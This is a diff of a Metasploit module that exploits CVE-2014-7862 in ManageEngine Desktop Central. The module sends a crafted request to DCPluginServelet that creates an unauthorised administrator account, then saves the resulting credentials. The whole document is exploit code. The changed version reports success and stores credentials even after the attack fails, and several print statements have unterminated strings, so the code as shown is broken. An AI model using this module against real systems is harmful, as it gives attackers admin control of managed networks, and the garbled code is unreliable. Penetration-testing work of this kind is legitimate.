@@ -12,18 +12,18 @@ class Metasploit3 < Msf::Auxiliary
1212
1313 def initialize ( info = { } )
1414 super ( update_info ( info ,
15- 'Name' => 'ManageEngine Desktop Central Administrator Account Creation' ,
16- 'Description' => %q{
15+ 'Name' => 'ManageEngine Desktop Central Administrator Account Creation' ,
16+ 'Description' => %q{
1717 This module exploits an administrator account creation vulnerability in Desktop Central
1818 from v7 onwards by sending a crafted request to DCPluginServelet. It has been tested in
1919 several versions of Desktop Central (including MSP) from v7 onwards.
2020 } ,
21- 'Author' =>
21+ 'Author' =>
2222 [
2323 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
2424 ] ,
25- 'License' => MSF_LICENSE ,
26- 'References' =>
25+ 'License' => MSF_LICENSE ,
26+ 'References' =>
2727 [
2828 [ 'CVE' , '2014-7862' ] ,
2929 [ 'OSVDB' , '116554' ] ,
@@ -49,48 +49,49 @@ def run
4949 password_encoded = Rex ::Text . encode_base64 ( [ Rex ::Text . md5 ( datastore [ 'PASSWORD' ] + salt ) ] . pack ( 'H*' ) )
5050
5151 res = send_request_cgi ( {
52- 'uri' => normalize_uri ( target_uri . path , "/servlets/DCPluginServelet" ) ,
53- 'method' => 'GET' ,
52+ 'uri' => normalize_uri ( target_uri . path , "/servlets/DCPluginServelet" ) ,
53+ 'method' => 'GET' ,
5454 'vars_get' => {
55- 'action' => 'addPlugInUser' ,
56- 'role' => 'DCAdmin' ,
57- 'userName' => datastore [ 'USERNAME' ] ,
58- 'email' => datastore [ 'EMAIL' ] ,
59- 'phNumber' => Rex ::Text . rand_text_numeric ( 6 ) ,
60- 'password' => password_encoded ,
61- 'salt' => salt ,
55+ 'action' => 'addPlugInUser' ,
56+ 'role' => 'DCAdmin' ,
57+ 'userName' => datastore [ 'USERNAME' ] ,
58+ 'email' => datastore [ 'EMAIL' ] ,
59+ 'phNumber' => Rex ::Text . rand_text_numeric ( 6 ) ,
60+ 'password' => password_encoded ,
61+ 'salt' => salt ,
6262 'createdtime' => salt
6363 }
6464 } )
65- if res && res . code == 200 && res . body . to_s =~ /sucess/
66- # Yes, "sucess" is really mispelt, as is "Servelet" ... !
67- print_good ( "#{ peer } #{ datastore [ 'USERNAME' ] } #{ datastore [ 'PASSWORD' ] } )
68- service_data = {
69- address : rhost ,
70- port : rport ,
71- service_name : ( ssl ? 'https' : 'http' ) ,
72- protocol : 'tcp' ,
73- workspace_id : myworkspace_id
74- }
75- credential_data = {
76- origin_type : :service ,
77- module_fullname : self . fullname ,
78- private_type : :password ,
79- private_data : datastore [ 'PASSWORD' ] ,
80- username : datastore [ 'USERNAME' ]
81- }
8265
83- credential_data . merge! ( service_data )
84- credential_core = create_credential ( credential_data )
85- login_data = {
86- core : credential_core ,
87- access_level : 'Administrator' ,
88- status : Metasploit ::Model ::Login ::Status ::UNTRIED
89- }
90- login_data . merge! ( service_data )
91- create_credential_login ( login_data )
92- else
66+ # Yes, "sucess" is really mispelt, as is "Servelet" ... !
67+ unless res && res . code == 200 && res . body && res . body . to_s =~ /sucess/
9368 print_error ( "#{ peer } )
9469 end
70+
71+ print_good ( "#{ peer } #{ datastore [ 'USERNAME' ] } #{ datastore [ 'PASSWORD' ] } )
72+ service_data = {
73+ address : rhost ,
74+ port : rport ,
75+ service_name : ( ssl ? 'https' : 'http' ) ,
76+ protocol : 'tcp' ,
77+ workspace_id : myworkspace_id
78+ }
79+ credential_data = {
80+ origin_type : :service ,
81+ module_fullname : self . fullname ,
82+ private_type : :password ,
83+ private_data : datastore [ 'PASSWORD' ] ,
84+ username : datastore [ 'USERNAME' ]
85+ }
86+
87+ credential_data . merge! ( service_data )
88+ credential_core = create_credential ( credential_data )
89+ login_data = {
90+ core : credential_core ,
91+ access_level : 'Administrator' ,
92+ status : Metasploit ::Model ::Login ::Status ::UNTRIED
93+ }
94+ login_data . merge! ( service_data )
95+ create_credential_login ( login_data )
9596 end
9697end
0 commit comments